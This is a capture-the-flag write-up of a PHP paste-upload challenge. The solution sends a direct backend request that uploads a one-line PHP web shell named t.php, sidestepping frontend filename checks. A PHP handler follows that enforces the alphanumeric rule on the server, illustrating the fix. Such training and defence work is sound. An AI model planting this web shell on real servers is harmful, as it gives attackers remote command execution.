SCS
Description
SCS [Web]
We uncovered a code repository and it appears to be where ARIA is storing mission-critical code. We need to break in!
https://uscybercombine-s4-scs.chals.io/
Solution

Uploaded files are placed in the /uploads directory.

The technology used is PHP

The frontend rejects special characters in the file name:
Paste file name can only contain alphanumeric characters
But a direct request to the backend bypasses this check:

Upload shell:
{
"pasteContent": "<?PHP echo system($_REQUEST[0]); ?>",
"pasteFileName":"t.php"
}
It works:
After some enumeration, we find the location of the real flag.txt.
Flag: SIVBGR{v@lidate_s3rver_s1de}
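The flag's lesson is to validate on the server. As an added example (not part of the original writeup or the challenge's code), here is a PHP handler that enforces the frontend's alphanumeric rule server-side. The handler shape, `PASTE_DIR`, the temp directory used by the demo loop and the function names are assumptions; only the `pasteContent` and `pasteFileName` fields come from the request above.

```php
<?php
declare(strict_types=1);

// Assumed storage location outside the web root, so stored pastes are
// never handed to the PHP interpreter (hypothetical path).
const PASTE_DIR = '/var/lib/pastes';

/**
 * Enforce on the server the rule the frontend shows:
 * "Paste file name can only contain alphanumeric characters".
 * Returns the path to write to, or null if the name is rejected.
 */
function pastePath(mixed $name, string $dir = PASTE_DIR): ?string
{
    // \A and \z anchor the whole string; $ alone would allow a trailing newline.
    if (!is_string($name) || preg_match('/\A[A-Za-z0-9]{1,64}\z/', $name) !== 1) {
        return null;
    }
    // The server, not the client, chooses the extension.
    return $dir . '/' . $name . '.txt';
}

/** Handle one decoded JSON request body; returns [HTTP status, message]. */
function handlePaste(mixed $body, string $dir = PASTE_DIR): array
{
    if (!is_array($body) || !is_string($body['pasteContent'] ?? null)) {
        return [400, 'malformed request'];
    }
    $path = pastePath($body['pasteFileName'] ?? null, $dir);
    if ($path === null) {
        return [400, 'invalid paste file name'];
    }
    if (file_put_contents($path, $body['pasteContent'], LOCK_EX) === false) {
        return [500, 'could not store paste'];
    }
    return [201, basename($path)];
}

// Constructed sample requests, written to a temp directory for the demo.
$dir = sys_get_temp_dir();
foreach (['notes1', 't.php', '../x', "abc\n", ''] as $name) {
    [$status, $msg] = handlePaste(['pasteContent' => 'hello', 'pasteFileName' => $name], $dir);
    printf("%-10s -> %d %s\n", json_encode($name), $status, $msg);
}
```

With this check the `t.php` name is rejected because of the dot, and every accepted paste is stored with a server-chosen `.txt` extension.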